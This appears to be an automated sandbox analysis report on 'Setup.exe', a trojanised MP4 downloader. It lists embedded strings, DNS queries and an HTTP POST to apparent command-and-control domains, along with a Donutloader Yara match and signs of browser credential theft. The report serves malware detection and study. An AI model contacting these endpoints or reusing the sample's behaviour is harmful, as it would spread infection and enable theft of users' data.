name="twitter:image:src" content="<meta name="twitter:image" content="%s\ServicesJSX_duk.exeJSX_SM.dllJSX_V8.dllMediaLanguages%s\Python-32\python.exe%s\Python-64\python.exehttps:/</article><article</table><table<link<meta/div<div</style><style><script</body><body></head><head></html><html>/MPD><MPD.hlsCXMediaSearchThumbnailDownloadThreadl equals www.yahoo.com (Yahoo)
              Source: Setup.exeString found in binary or memory: zcABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789$%3Dsig?n=;n=&n=?sig=?signature=;sig=;signature=&sig=&signature=<INPUT>%s\youtube.com-n.js%s\youtube.com-sig.js%s/youtube.com-n.jshttp://www.fuxiangliu.com/services%s/youtube.com-sig.js//s.ytimg.com//www.youtube.comvar %s%s; input="<INPUT>"; output=%s(input); console.log(output);Decipher_n=function(enhanced_except_var %s={%s};var var %s=function(a){%s}; input="<INPUT>"; output=%s(input); console.log(output);Decipher_sig;a=a.split("")jsUrlWEB_PLAYER_CONTEXT_CONFIG_ID_KEVLAR_WATCHWEB_PLAYER_CONTEXT_CONFIGSPLAYER_JS_URLXSRF_TOKENXSRF_FIELD_NAMEVISITOR_DATASIGNIN_URLSERVER_NAMEPAGE_CLPAGE_BUILD_LABELLOGGED_INclient.nameLATEST_ECATCHER_SERVICE_TRACKING_PARAMSuserInterfaceThemeINNERTUBE_CONTEXTINNERTUBE_CONTEXT_HLINNERTUBE_CONTEXT_GLINNERTUBE_CONTEXT_CLIENT_VERSIONINNERTUBE_CONTEXT_CLIENT_NAMEINNERTUBE_CLIENT_VERSIONINNERTUBE_CLIENT_NAMEINNERTUBE_API_VERSIONINNERTUBE_API_KEYplayerParamswatchEndpointnavigationEndpointswebPrefetchDatawebResponseContextExtensionDataresponseContextbrowseEndpointnavigationEndpointfeaturedChannelplayerAnnotationsExpandedRendererannotationstrackingParamsisPrivateauthorviewCountshortDescriptionchannelIdcontextParamsplayabilityStatusoriginalUrljsUrlresponseContextytInitialData =playabilityStatusytInitialPlayerResponse ="playabilityStatus":"videoDetails":"streamingData":"captions":https://www.google.com/Google Searchgoogle.searchgoogle.com/url?url=https://www.yahoo.com/Yahoo Searchyahoo.searchvideo.search.yahoo.comrurl=youtube.com.InnerTubeyoutube.com.WebPageContentComponentVIDEOpornhubfacebookextractorvcodecextHTML5JWPlayerposter="audio/wavaudio/oggaudio/mpeg<audio</audio>https://%s%saddParam('flashvars',addParam("flashvars",var videoFile="var videoFile='var filepath = "var filepath = 'jwplayermp4aavc1av1vp9vorbisvp8h264Auto close within 00:%02dEnglishTranslatedOriginalCodeLanguages1.0.0M3U8<meta name="title" content="<meta name="twitter:title" content="<meta property="og:image:secure_url" content="<meta name="twitter:image:src" content="<meta name="twitter:image" content="%s\ServicesJSX_duk.exeJSX_SM.dllJSX_V8.dllMediaLanguages%s\Python-32\python.exe%s\Python-64\python.exehttps:/</article><article</table><table<link<meta/div<div</style><style><script</body><body></head><head></html><html>/MPD><MPD.hlsCXMediaSearchThumbnailDownloadThreadl equals www.youtube.com (Youtube)
              Source: global trafficDNS traffic detected: DNS query: sloppymisskr.click
              Source: global trafficDNS traffic detected: DNS query: cegu.shop
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sloppymisskr.click
              Source: Setup.exe, 00000000.00000003.1851630664.00000000035B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: Setup.exe, 00000000.00000003.1851630664.00000000035B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: Setup.exeString found in binary or memory: http://certificates.starfieldtech.com/repository/1604
              Source: Setup.exe, Setup.exe, 00000000.00000003.1870829227.0000000000789000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094224037.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1864396067.0000000000789000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: Setup.exe, 00000000.00000003.1851630664.00000000035B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: Setup.exeString found in binary or memory: http://crl.starfieldtech.com/repository/0
              Source: Setup.exeString found in binary or memory: http://crl.starfieldtech.com/repository/sfsroot.crl0P
              Source: Setup.exeString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: Setup.exe, 00000000.00000003.1851630664.00000000035B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: Setup.exe, 00000000.00000003.1851630664.00000000035B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: Setup.exe, 00000000.00000003.1851630664.00000000035B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: Setup.exe, 00000000.00000003.1851630664.00000000035B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: Setup.exe, 00000000.00000003.1851630664.00000000035B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: Setup.exe, 00000000.00000003.1851630664.00000000035B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: Setup.exeString found in binary or memory: http://ocsp.starfieldtech.com/0D
              Source: Setup.exeString found in binary or memory: http://ocsp.thawte.com0
              Source: Setup.exeString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
              Source: Setup.exeString found in binary or memory: http://s2.symcb.com0
              Source: Setup.exeString found in binary or memory: http://sf.symcb.com/sf.crl0f
              Source: Setup.exeString found in binary or memory: http://sf.symcb.com/sf.crt0
              Source: Setup.exeString found in binary or memory: http://sf.symcd.com0&
              Source: Setup.exeString found in binary or memory: http://sv.symcb.com/sv.crl0W
              Source: Setup.exeString found in binary or memory: http://sv.symcb.com/sv.crt0
              Source: Setup.exeString found in binary or memory: http://sv.symcd.com0&
              Source: Setup.exeString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: Setup.exeString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: Setup.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: Setup.exeString found in binary or memory: http://www.fuxiangliu.com/services%s/youtube.com-sig.js//s.ytimg.com//www.youtube.comvar
              Source: Setup.exeString found in binary or memory: http://www.symauth.com/cps0(
              Source: Setup.exeString found in binary or memory: http://www.symauth.com/rpa00
              Source: Setup.exe, 00000000.00000003.1851630664.00000000035B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: Setup.exe, 00000000.00000003.1851630664.00000000035B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: Setup.exe, 00000000.00000003.1821183132.00000000035BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: Setup.exeString found in binary or memory: https://api.github.com/repos/ytdl-org/ytdl-nightly/releases/latestMX_ytdlbrowser_download_urlyoutube
              Source: Setup.exeString found in binary or memory: https://cdn-fck.tnaflix.com/tnaflix/%s.fid?key=%s&VID=%s&nomp4=1&catID=0&rollover=1&startThumb=%s&em
              Source: Setup.exe, 00000000.00000003.1821183132.00000000035BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: Setup.exe, 00000000.00000003.3044975990.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094224037.00000000007EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop//
              Source: Setup.exe, 00000000.00000003.3044975990.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4119561424.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094224037.00000000007EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/1B
              Source: Setup.exe, 00000000.00000003.3044975990.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4119561424.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094224037.00000000007EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/4Q
              Source: Setup.exe, 00000000.00000003.3044975990.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.3045052270.0000000003571000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4120455837.0000000002ADB000.00000004.00000010.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4120658111.000000000357D000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094172559.000000000357C000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4119561424.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094224037.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094324102.0000000003568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/8574262446/ph.txt
              Source: Setup.exe, 00000000.00000003.3044975990.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4119561424.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094224037.00000000007EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/8574262446/ph.txt/P
              Source: Setup.exe, 00000000.00000002.4119493222.0000000000796000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.3044825543.000000000078C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.3045011086.0000000000794000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094437159.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop:443/8574262446/ph.txt
              Source: Setup.exe, 00000000.00000003.1821183132.00000000035BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: Setup.exe, 00000000.00000003.1821183132.00000000035BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: Setup.exeString found in binary or memory: https://d.symcb.com/cps0%
              Source: Setup.exeString found in binary or memory: https://d.symcb.com/rpa0
              Source: Setup.exe, Setup.exe, 00000000.00000002.4119493222.0000000000796000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.3044825543.000000000078C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.3044975990.00000000007ED000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094224037.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4120702904.0000000003594000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.3045011086.0000000000794000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.3045122596.0000000003593000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.3044550396.0000000003592000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094437159.000000000078B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094324102.0000000003568000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4120573743.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094519509.0000000003591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compName=
              Source: Setup.exe, 00000000.00000003.1821183132.00000000035BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: Setup.exe, 00000000.00000003.1821183132.00000000035BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: Setup.exe, 00000000.00000003.1821183132.00000000035BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: Setup.exeString found in binary or memory: https://hotmovs.comhttps://www.hqporner.com/hqpornerhqporner.com
              Source: Setup.exe, 00000000.00000003.2094324102.0000000003568000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4120573743.0000000003569000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txt
              Source: Setup.exe, 00000000.00000003.2094324102.0000000003568000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4120573743.0000000003569000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txtf1
              Source: Setup.exe, 00000000.00000003.2094437159.000000000078B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834336363.0000000003582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sloppymisskr.click/
              Source: Setup.exe, 00000000.00000003.1870829227.0000000000789000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1864396067.0000000000789000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sloppymisskr.click/$
              Source: Setup.exe, Setup.exe, 00000000.00000003.1892472910.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.3044975990.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1902947617.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4119561424.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1864396067.0000000000789000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094224037.00000000007EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sloppymisskr.click/api
              Source: Setup.exe, 00000000.00000003.3044975990.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4119561424.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094224037.00000000007EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sloppymisskr.click/apiE
              Source: Setup.exe, 00000000.00000003.1917452260.0000000003561000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1903114467.0000000003568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sloppymisskr.click/apiW
              Source: Setup.exe, 00000000.00000003.1864396067.0000000000789000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sloppymisskr.click/apib
              Source: Setup.exe, 00000000.00000003.1917452260.0000000003561000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094324102.0000000003568000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4120573743.0000000003569000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sloppymisskr.click/apie
              Source: Setup.exe, 00000000.00000003.1892306082.0000000003561000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1917452260.0000000003561000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094324102.0000000003568000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4120573743.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1903114467.0000000003568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sloppymisskr.click/apisp
              Source: Setup.exe, 00000000.00000003.1902947617.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sloppymisskr.click/apiy
              Source: Setup.exe, 00000000.00000003.2094224037.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4119539930.00000000007E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sloppymisskr.click/b6
              Source: Setup.exe, 00000000.00000003.2094224037.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4119539930.00000000007E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sloppymisskr.click/panym
              Source: Setup.exe, 00000000.00000003.1822159529.00000000035D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
              Source: Setup.exe, 00000000.00000003.1852703245.000000000381E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: Setup.exe, 00000000.00000003.1852703245.000000000381E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: Setup.exe, 00000000.00000003.1834178767.00000000035C9000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1822159529.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1822224930.00000000035C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: Setup.exe, 00000000.00000003.1822224930.00000000035A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: Setup.exe, 00000000.00000003.1834178767.00000000035C9000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1822159529.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1822224930.00000000035C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: Setup.exe, 00000000.00000003.1822224930.00000000035A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: Setup.exeString found in binary or memory: https://vivporn.com/wp-content/plugins/
              Source: Setup.exe, 00000000.00000003.1821183132.00000000035BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: Setup.exeString found in binary or memory: https://www.eporner.com/EPORNEReporner.comeporner.cdn.eporner.comhttps://www.eporner.com/video-%s//&
              Source: Setup.exeString found in binary or memory: https://www.eporner.com/xhr/video/%s?hash=%s&device=generic&domain=www.eporner.com&fallback=falsevar
              Source: Setup.exeString found in binary or memory: https://www.google.com/Google
              Source: Setup.exe, 00000000.00000003.1821183132.00000000035BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: Setup.exeString found in binary or memory: https://www.handjobhub.com/HandjobHubhandjobhub.comhandjobhub.cdn.handjobhub.comsrc=
              Source: Setup.exeString found in binary or memory: https://www.hotmovs.com/
              Source: Setup.exeString found in binary or memory: https://www.hotmovs.tube/hotmovs.comhotmovs.tubeis_defaultvideo_urlhttps://hotmovs.com/api/videofile
              Source: Setup.exe, 00000000.00000003.1852703245.000000000381E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: Setup.exe, 00000000.00000003.1852703245.000000000381E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: Setup.exe, 00000000.00000003.1852703245.000000000381E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: Setup.exe, 00000000.00000003.1852703245.000000000381E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: Setup.exe, 00000000.00000003.1852703245.000000000381E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: Setup.exeString found in binary or memory: https://www.redtube.com/RedTuberedtube.comredtube.https://www.redtube.com/%sid=/player/?id=?id=
              Source: Setup.exeString found in binary or memory: https://www.redtube.com/videohttps://www.thumbzilla.com/Thumbzillathumbzilla.comthumbzilla.
              Source: Setup.exeString found in binary or memory: https://www.tnaflix.com/Tnaflixtnaflix.comtnaflix.
              Source: Setup.exeString found in binary or memory: https://www.tomabo.com/mp4-player/download.html
              Source: Setup.exeString found in binary or memory: https://www.tomabo.com/mp4-player/purchase.htmlhttps://www.tomabo.com/mp4-playerhttps://www.tomabo.c
              Source: Setup.exeString found in binary or memory: https://www.tomabo.com/videos/dog-and-balls.mp4Please
              Source: Setup.exeString found in binary or memory: https://www.tomabo.comVersion
              Source: Setup.exeString found in binary or memory: https://www.txxx.com/
              Source: Setup.exeString found in binary or memory: https://www.txxx.tube/Txxxtxxx.comtxxx.tubehttps://txxx.com/api/videofile.php?video_id=%s&lifetime=%
              Source: Setup.exeString found in binary or memory: https://www.yahoo.com/Yahoo
              Source: Setup.exeString found in binary or memory: https://www.youtube.com/%I64d-%I64d-%I64d0-%I64dContent-Type:
              Source: Setup.exeString found in binary or memory: https://www.youtube.com/playlist?list=%shttps://i.ytimg.com/vi/%s/maxresdefault.jpghttps://i.ytimg.c
              Source: Setup.exeString found in binary or memory: https://www.youtube.com/watch?v=%s&gl=US&hl=en&has_verified=1&bpctr=9999999999lengthSecondshlsManife
              Source: Setup.exeString found in binary or memory: https://www.youtube.com/watch?v=Zk9J5xnTVMAZk9J5xnTVMAPlease
              Source: Setup.exeString found in binary or memory: https://www.youtube.com/youtubei/v1/browse?key=%s&prettyPrint=falseX-Goog-Visitor-Idcontinuationclic
              Source: Setup.exeString found in binary or memory: https://www.youtube.com/youtubei/v1/player?key=%s&prettyPrint=falseOriginX-Youtube-Client-VersionX-Y
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
              Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownHTTPS traffic detected: 104.21.90.109:443 -> 192.168.2.4:49748 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.90.109:443 -> 192.168.2.4:49749 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.90.109:443 -> 192.168.2.4:49750 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.90.109:443 -> 192.168.2.4:49752 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.90.109:443 -> 192.168.2.4:49753 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.90.109:443 -> 192.168.2.4:49754 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.90.109:443 -> 192.168.2.4:49755 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.90.109:443 -> 192.168.2.4:49756 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.90.109:443 -> 192.168.2.4:49757 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49758 version: TLS 1.2

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: C:\Users\user\Desktop\Setup.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_035674170_3_03567417
              Source: Setup.exeStatic PE information: invalid certificate
              Source: Setup.exe, 00000000.00000000.1669426879.000000000067F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMP4Downloader.EXE vs Setup.exe
              Source: Setup.exe, 00000000.00000003.1789823062.0000000002D66000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMP4Downloader.EXE vs Setup.exe
              Source: Setup.exeBinary or memory string: OriginalFilenameMP4Downloader.EXE vs Setup.exe
              Source: Setup.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: 00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@2/2
              Source: Setup.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\Setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: Setup.exe, 00000000.00000003.1821440058.00000000035A8000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1822304760.000000000357C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: Setup.exeReversingLabs: Detection: 15%
              Source: Setup.exeVirustotal: Detection: 8%
              Source: C:\Users\user\Desktop\Setup.exeFile read: C:\Users\user\Desktop\Setup.exeJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: acgenral.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: msacm32.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: oledlg.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: winhttp.dllJump to behavior
